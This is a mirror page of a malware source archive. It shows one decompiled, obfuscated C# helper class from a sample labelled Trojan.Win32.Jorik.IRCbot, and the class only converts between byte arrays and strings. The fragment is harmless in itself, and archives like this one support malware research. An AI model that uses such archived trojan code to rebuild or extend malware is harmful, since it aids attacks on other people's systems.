mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-21 02:46:10 +00:00
f2ac1ece55
add
34 lines
1.2 KiB
C#
34 lines
1.2 KiB
C#
// Decompiled with JetBrains decompiler
|
|
// Type: xp43p4bxx3i3uxg5zqeqr3mkos0wzm3ep
|
|
// Assembly: 4ldbvrmz, Version=6.0.220.4, Culture=neutral, PublicKeyToken=null
|
|
// MVID: 7CE81D78-4EC2-4D47-AD6D-9A598C5B77D4
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.Win32.Jorik.IRCbot.cwp-92f7e121edf5bcaced863d99561f0db912de86a6c07c307f3e429d5ad8e8f881.exe
|
|
|
|
using System;
|
|
using System.Text;
|
|
|
|
public static class xp43p4bxx3i3uxg5zqeqr3mkos0wzm3ep
|
|
{
|
|
public static string jeuqjvb1edhczrmrcddcfjyrbkgzy5eq5(byte[] Xone43ogluazbv5l4yr3mqy3y)
|
|
{
|
|
StringBuilder stringBuilder = new StringBuilder();
|
|
for (int index = 0; index < Xone43ogluazbv5l4yr3mqy3y.Length; ++index)
|
|
{
|
|
char ch = Convert.ToChar(Xone43ogluazbv5l4yr3mqy3y[index]);
|
|
stringBuilder.Append(Convert.ToString(ch));
|
|
}
|
|
return stringBuilder.ToString();
|
|
}
|
|
|
|
public static byte[] P0vqw5dxvbkxvsohiqrze00bk(string Aaa00x4vdfc3y4ixq)
|
|
{
|
|
byte[] numArray = new byte[Aaa00x4vdfc3y4ixq.Length];
|
|
for (int startIndex = 0; startIndex < Aaa00x4vdfc3y4ixq.Length; ++startIndex)
|
|
{
|
|
char ch = Convert.ToChar(Aaa00x4vdfc3y4ixq.Substring(startIndex, 1));
|
|
numArray[startIndex] = Convert.ToByte(ch);
|
|
}
|
|
return numArray;
|
|
}
|
|
}
|